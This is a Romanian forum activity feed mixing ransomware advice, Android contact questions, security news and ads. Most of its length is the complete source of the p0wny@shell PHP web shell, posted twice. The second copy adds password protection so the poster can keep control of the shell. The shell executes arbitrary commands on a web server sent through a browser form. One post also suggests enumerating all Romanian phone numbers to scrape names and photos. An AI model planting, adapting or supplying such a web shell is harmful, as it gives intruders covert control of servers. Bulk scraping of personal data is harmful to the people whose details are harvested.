Jump to content

All Activity

This stream auto-updates     

  1. Today
  2. Du-te ma deacea expiratule. Da-var pastele sa va dea. Tu nu vezi ca lumea aicea face treaba, cauta sa vada de unde sunt luate pozele, in ce format, etc. Vii tu cu dat cu parerea despre "serverul android".
  3. Salutare!!! Ce am observat si eu este ca, cand deschizi agenda la android gasesti poza ta ca proprietar iar sub ai sa gasesti o sectiune numita ACTUALIZARI e de aici incepe distractia ca vezi cine ce poza are... probabil e pe baza numarului de telefon cand il salvezi in agenda unele detalii le pune fortat android-ul. "Ca doar se vrea controlul lumii" in felul asta. Cu cat apar versiuni noi de android sau alte software de telefon cam toate duc in aceeasi directie si au acelas interes care este comun "sa detina date si cand respiri sau de cate ori ai clipit" cu voia noastra sau nu. P.s. e simpla treaba tot ce iese sau intra in Device trece printrun server care stocheaza asa ca nu te mira ca il treci in agenda "flasneta" si dupa o picatura de conexiune la net il gasesti trecut "trompeta" ca asa ii este numele defapt.
  4. Monitor LED IPS LG 23MP48HQ-P, 23", Full HD - 300 Lei https://www.pricezone.ro/product/monitor-led-ips-lg-23mp48hq-p-23quot-full-hd-negru-p176795
  5. Yesterday
  6. hate.me

    Reversing Engineering Workshop

    https://sites.google.com/secured.org/malwareunicorn/reverse-engineering/re101
  7. EnCase-ul la putere hehehe. Apropo. Expert in linux si cafea. Ce cafea bei?
  8. “A Latvian “non-citizen,” suggesting a citizen of the former USSR who resided in Riga, Latvia, was convicted to 168 months in prison today for offences related to his operation of “Scan4you,” an online counter antivirus service that supported computer hackers determine whether the computer viruses and other malicious software they created would be detected by antivirus software, announced Assistant Attorney General Brian A. ” reads the press release published by DoJ. https://latesthackingnews.com/2018/09/23/scan4you-sentenced-to-14-years-in-jail/
  9. Fara-Prostime

    Implementare parola pentru accesarea unui fisier php

    Am rezolvat: Shell.php: <?php include 'login.php'; function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("/^\s*cd\s*$/", $cmd)) { // pass } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array( "stdout" => $stdout, "cwd" => getcwd() ); } function featurePwd() { return array("cwd" => getcwd()); } function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = "compgen -c $fileName"; } else { $cmd = "compgen -f $fileName"; } $cmd = "/bin/bash -c \"$cmd\""; $files = explode("\n", shell_exec($cmd)); return array( 'files' => $files, ); } if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); } echo json_encode($response); die(); } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>p0wny@shell:~#</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <style> html, body { margin: 0; padding: 0; background: #333; color: #eee; font-family: monospace; } #shell { background: #222; max-width: 800px; margin: 50px auto 0 auto; box-shadow: 0 0 5px rgba(0, 0, 0, .3); font-size: 10pt; display: flex; flex-direction: column; align-items: stretch; } #shell-content { height: 500px; overflow: auto; padding: 5px; white-space: pre-wrap; flex-grow: 1; } #shell-logo { font-weight: bold; color: #FF4180; text-align: center; } @media (max-width: 991px) { #shell-logo { display: none; } html, body, #shell { height: 100%; width: 100%; max-width: none; } #shell { margin-top: 0; } } @media (max-width: 767px) { #shell-input { flex-direction: column; } } .shell-prompt { font-weight: bold; color: #75DF0B; } .shell-prompt > span { color: #1BC9E7; } #shell-input { display: flex; box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); border-top: rgba(255, 255, 255, .05) solid 1px; } #shell-input > label { flex-grow: 0; display: block; padding: 0 5px; height: 30px; line-height: 30px; } #shell-input #shell-cmd { height: 30px; line-height: 30px; border: none; background: transparent; color: #eee; font-family: monospace; font-size: 10pt; width: 100%; align-self: center; } #shell-input div { flex-grow: 1; align-items: stretch; } #shell-input input { outline: none; } </style> <script> var CWD = null; var commandHistory = []; var historyPosition = 0; var eShellCmdInput = null; var eShellContent = null; function _insertCommand(command) { eShellContent.innerHTML += "\n\n"; eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> '; eShellContent.innerHTML += escapeHtml(command); eShellContent.innerHTML += "\n"; eShellContent.scrollTop = eShellContent.scrollHeight; } function _insertStdout(stdout) { eShellContent.innerHTML += escapeHtml(stdout); eShellContent.scrollTop = eShellContent.scrollHeight; } function featureShell(command) { _insertCommand(command); makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function(response) { _insertStdout(response.stdout.join("\n")); updateCwd(response.cwd); }); } function featureHint() { if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete function _requestCallback(data) { if (data.files.length <= 1) return; // no completion if (data.files.length === 2) { if (type === 'cmd') { eShellCmdInput.value = data.files[0]; } else { var currentValue = eShellCmdInput.value; eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]); } } else { _insertCommand(eShellCmdInput.value); _insertStdout(data.files.join("\n")); } } var currentCmd = eShellCmdInput.value.split(" "); var type = (currentCmd.length === 1) ? "cmd" : "file"; var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1]; makeRequest( "?feature=hint", { filename: fileName, cwd: CWD, type: type }, _requestCallback ); } function genPrompt(cwd) { cwd = cwd || "~"; var shortCwd = cwd; if (cwd.split("/").length > 3) { var splittedCwd = cwd.split("/"); shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; } return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#"; } function updateCwd(cwd) { if (cwd) { CWD = cwd; _updatePrompt(); return; } makeRequest("?feature=pwd", {}, function(response) { CWD = response.cwd; _updatePrompt(); }); } function escapeHtml(string) { return string .replace(/&/g, "&amp;") .replace(/</g, "&lt;") .replace(/>/g, "&gt;"); } function _updatePrompt() { var eShellPrompt = document.getElementById("shell-prompt"); eShellPrompt.innerHTML = genPrompt(CWD); } function _onShellCmdKeyDown(event) { switch (event.key) { case "Enter": featureShell(eShellCmdInput.value); insertToHistory(eShellCmdInput.value); eShellCmdInput.value = ""; break; case "ArrowUp": if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case "ArrowDown": if (historyPosition >= commandHistory.length) { break; } historyPosition++; if (historyPosition === commandHistory.length) { eShellCmdInput.value = ""; } else { eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case 'Tab': event.preventDefault(); featureHint(); break; } } function insertToHistory(cmd) { commandHistory.push(cmd); historyPosition = commandHistory.length; } function makeRequest(url, params, callback) { function getQueryString() { var a = []; for (var key in params) { if (params.hasOwnProperty(key)) { a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key])); } } return a.join("&"); } var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { try { var responseJson = JSON.parse(xhr.responseText); callback(responseJson); } catch (error) { alert("Error while parsing response: " + error); } } }; xhr.send(getQueryString()); } window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); updateCwd(); eShellCmdInput.focus(); }; </script> </head> <body> <div id="shell"> <pre id="shell-content"></pre> <div id="shell-input"> <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label> <div> <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/> </div> </div> </div> </body> </html> Login.php: <?php $realm = 'Restricted area'; //user => password $users = array('userutul' => 'paroluta'); if (empty($_SERVER['PHP_AUTH_DIGEST'])) { header('HTTP/1.1 401 Unauthorized'); header('WWW-Authenticate: Digest realm="'.$realm. '",qop="auth",nonce="'.uniqid().'",opaque="'.md5($realm).'"'); die('Apesi cancel ca bou.. Bagale daca esti jmeq :))'); } // analyze the PHP_AUTH_DIGEST variable if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']])) die('Wrong Credentials!'); // generate the valid response $A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]); $A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']); $valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2); if ($data['response'] != $valid_response) die('Wrong Credentials!'); // function to parse the http auth header function http_digest_parse($txt) { // protect against missing data $needed_parts = array('nonce'=>1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1); $data = array(); $keys = implode('|', array_keys($needed_parts)); preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER); foreach ($matches as $m) { $data[$m[1]] = $m[3] ? $m[3] : $m[4]; unset($needed_parts[$m[1]]); } return $needed_parts ? false : $data; } ?>
  10. Cat de sigur esti, ca cand ai facut export din WP, nu ti-a facut el singur export si la poze si la nume si etc?
  11. Backup & Restore de pe Windows phone (din setari) si apoi import pe telefonul cu Android cu aplicatia asta.
  12. Salut, Am gasit pe google un shell.php la care as dori sa ii pun parola. Nu prea ma descurc Ma poate ajuta cineva? <?php function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("/^\s*cd\s*$/", $cmd)) { // pass } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array( "stdout" => $stdout, "cwd" => getcwd() ); } function featurePwd() { return array("cwd" => getcwd()); } function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = "compgen -c $fileName"; } else { $cmd = "compgen -f $fileName"; } $cmd = "/bin/bash -c \"$cmd\""; $files = explode("\n", shell_exec($cmd)); return array( 'files' => $files, ); } if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); } header("Content-Type: application/json"); echo json_encode($response); die(); } ?><!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>p0wny@shell:~#</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <style> html, body { margin: 0; padding: 0; background: #333; color: #eee; font-family: monospace; } #shell { background: #222; max-width: 800px; margin: 50px auto 0 auto; box-shadow: 0 0 5px rgba(0, 0, 0, .3); font-size: 10pt; display: flex; flex-direction: column; align-items: stretch; } #shell-content { height: 500px; overflow: auto; padding: 5px; white-space: pre-wrap; flex-grow: 1; } #shell-logo { font-weight: bold; color: #FF4180; text-align: center; } @media (max-width: 991px) { #shell-logo { display: none; } html, body, #shell { height: 100%; width: 100%; max-width: none; } #shell { margin-top: 0; } } @media (max-width: 767px) { #shell-input { flex-direction: column; } } .shell-prompt { font-weight: bold; color: #75DF0B; } .shell-prompt > span { color: #1BC9E7; } #shell-input { display: flex; box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); border-top: rgba(255, 255, 255, .05) solid 1px; } #shell-input > label { flex-grow: 0; display: block; padding: 0 5px; height: 30px; line-height: 30px; } #shell-input #shell-cmd { height: 30px; line-height: 30px; border: none; background: transparent; color: #eee; font-family: monospace; font-size: 10pt; width: 100%; align-self: center; } #shell-input div { flex-grow: 1; align-items: stretch; } #shell-input input { outline: none; } </style> <script> var CWD = null; var commandHistory = []; var historyPosition = 0; var eShellCmdInput = null; var eShellContent = null; function _insertCommand(command) { eShellContent.innerHTML += "\n\n"; eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> '; eShellContent.innerHTML += escapeHtml(command); eShellContent.innerHTML += "\n"; eShellContent.scrollTop = eShellContent.scrollHeight; } function _insertStdout(stdout) { eShellContent.innerHTML += escapeHtml(stdout); eShellContent.scrollTop = eShellContent.scrollHeight; } function featureShell(command) { _insertCommand(command); makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function(response) { _insertStdout(response.stdout.join("\n")); updateCwd(response.cwd); }); } function featureHint() { if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete function _requestCallback(data) { if (data.files.length <= 1) return; // no completion if (data.files.length === 2) { if (type === 'cmd') { eShellCmdInput.value = data.files[0]; } else { var currentValue = eShellCmdInput.value; eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]); } } else { _insertCommand(eShellCmdInput.value); _insertStdout(data.files.join("\n")); } } var currentCmd = eShellCmdInput.value.split(" "); var type = (currentCmd.length === 1) ? "cmd" : "file"; var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1]; makeRequest( "?feature=hint", { filename: fileName, cwd: CWD, type: type }, _requestCallback ); } function genPrompt(cwd) { cwd = cwd || "~"; var shortCwd = cwd; if (cwd.split("/").length > 3) { var splittedCwd = cwd.split("/"); shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; } return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#"; } function updateCwd(cwd) { if (cwd) { CWD = cwd; _updatePrompt(); return; } makeRequest("?feature=pwd", {}, function(response) { CWD = response.cwd; _updatePrompt(); }); } function escapeHtml(string) { return string .replace(/&/g, "&amp;") .replace(/</g, "&lt;") .replace(/>/g, "&gt;"); } function _updatePrompt() { var eShellPrompt = document.getElementById("shell-prompt"); eShellPrompt.innerHTML = genPrompt(CWD); } function _onShellCmdKeyDown(event) { switch (event.key) { case "Enter": featureShell(eShellCmdInput.value); insertToHistory(eShellCmdInput.value); eShellCmdInput.value = ""; break; case "ArrowUp": if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case "ArrowDown": if (historyPosition >= commandHistory.length) { break; } historyPosition++; if (historyPosition === commandHistory.length) { eShellCmdInput.value = ""; } else { eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case 'Tab': event.preventDefault(); featureHint(); break; } } function insertToHistory(cmd) { commandHistory.push(cmd); historyPosition = commandHistory.length; } function makeRequest(url, params, callback) { function getQueryString() { var a = []; for (var key in params) { if (params.hasOwnProperty(key)) { a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key])); } } return a.join("&"); } var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { try { var responseJson = JSON.parse(xhr.responseText); callback(responseJson); } catch (error) { alert("Error while parsing response: " + error); } } }; xhr.send(getQueryString()); } window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); updateCwd(); eShellCmdInput.focus(); }; </script> </head> <body> <div id="shell"> <pre id="shell-content"></pre> <div id="shell-input"> <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label> <div> <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/> </div> </div> </div> </body> </html>
  13. Bazele de date cu evidenta populatiei din Brasov au fost infestate cu ransomware. Li s-a propus o solutie de securitate si backup chiar cu cateva luni inainte. Vina e a lor pentru ca nu isi dau seama ca sunt expusi la multe pe internet. Dar cine sa faca planning daca angajatii sunt pe pile si stau toata ziua pe facebook...
  14. yooproject

    Vand pagina de 210.000 fani Mexic

    Ti-am trimis pm
  15. În situații de genul, nu prea ai ce face altceva. Cu atât cu cât încearcă mai multe căi de a rezolva, cu atât cresc șansele să rezolve problema. Știu că ai noștri mai colaborau și cu FBI care își înființase o filială la noi legat de criminalitatea cibernetică. Nu e neapărat să-ți pui baza în telefoanele lor fixe din birouri, dar fiind în UE mai pot cere ajutorul colegilor. Și acum legat de postarea inițială: și firmele de cartier au măcar un back-up în Google drive, dă-o-n sărăcie de treabă. Adică când ai idioți în firmă care prezintă riscul de a deschide atașamente de la indieni, backup-ul e sfânt. Nu că altfel nu ar fi. Dar povestea asta o să se mai repete în România niște ani pentru că lumea ia securitatea și măsurile de protecție la mișto.
  16. Install very good antivirus to protect your PC. CHECK OUT THE PRICE HERE: Norton antivirus price in Bangladesh
  17. Last week
  18. SIncer sa fiu nu am fost , eu spun ce mi-a zis el . Nu stiu foarte bine daca sunt datele clientilor , probabil ei stiu mai bine. Eu doar incerc sa ajut un prieten...
  19. :)))))))))))) Ce expertiza man? Ai fost vreodata pe acolo la ei la birouri sa vezi ce conditii si scule au? Hahahahahha
  20. Adaug la @spider: Stii ca exista legi care amendeaza si firma in caz ca pierd datele clientilor. Daca sunt date personale, datele clientilor, etc. afectate ai un termen sa anunti problema. Daca se descopera ca firma nu respecta legile de protectie a datelor intra si patronul la belele. Sfatul meu e sa se informeze repede de legi si sa notifice problema la institutiile statului. Sunt niste pasi legali care trebuie respectati... Dupa sa caute pe cineva care sa recupereze datele din alte surse. (Daca exista backup, poate din alte documente printate sau din alte calculatoare se pot recupera partial niste date, se unele numere pot fi estimate sau recalculate). Sansele sa recuperezi ceva din pc infectat sunt > 10% (daca ii platesti) si >1% daca nu ii platesti.
  21. Hai ma, vorbesti serios? ... expert in calc, ce plm crezi ca o sa faca ala? o sa frece menta cateva ore pe langa fisierele criptate, la final dupa ce va abureste cu cateva explicatii dinainte pregatite, o sa va spuna ca nu se poate face nimic. Stiam ca astea au ceva "termen de expirare a key-ului ptr decriptare" un anumit interval de timp, apoi se duce si acel request. Trebuia de la inceput, fiind vorba dupa cum spui tu, de o firma mare, anuntata politia, de acolo va ghidau ei ce si cum, dar cum romanul e carpaci, crede ca o poate rezolva si altfel.. Din punctul meu de vedere, daca nu plateste suma respectiva si totusi printr-o minune sa-i deblocheze sistemul, toate datele sunt deja pierdute, like4ever.
  22. Cum ți-ai copiat contactele de pe wp pe redmi?
  23. va multumesc pentru sfaturi , am luat legatura cu un expert in securitate dar nu poate sa vina sa vada despre ce e vorba decat marti .. si din cauza virusului nu se pot emite facturi, nu se poate face nimic..
  24. Încearcă să iei legătura cu poliția, respectiv DCCO, pentru că sunt printre singurii care au expertiza și mijloacele de a ajunge la indienii ăștia opăriți. Recomand asta pentru că am mai auzit de cazuri rezolvate de ei tot pe partea asta de țepe prin criptomonede/ransomware. Spor!
  25. Poate are aplicatia de telefon default pe asta: "Truecaller - Caller ID & Block". Oricum e interesant de generat o agenda cu toate nr din ro si de scrapuit numele si pozele.
  26. Spider are dreptate. E posibil ca ransomwareul sa fie folosit de niste script kiddies care nici nu stiu sa il foloseasca. E de la niste indieni clocici. Mergeti pe firul epic,identificati procesul care a facut criptarea si incercati sa ii dati momeala, gen sa mai copiati alte fisiere sa vedeti daca incearca sa le cripteze. Teoretic ar trebui sa fie o singura cheie de criptare pt tot pcul. Si atunci cand se apuca sa cripteze faceti un process dump sa prindeti cheia din ram. Acum nu stiu daca functioneaza, sunt ipoteze... PS: CE AM MAI GASIT ULTERIOR, DECAT DELOC E BINE SI ASA: https://sensorstechforum.com/coded-file-virus-remove-restore-files/ https://quickremovevirus.com/how-can-i-remove-decoder_masterindia-com-virus-completely/ http://ru.pcviruscare.com/blog/удалите-decoder_masterindia-com-помощь-по-удалению-вредо Bafta!
  1. Load more activity
×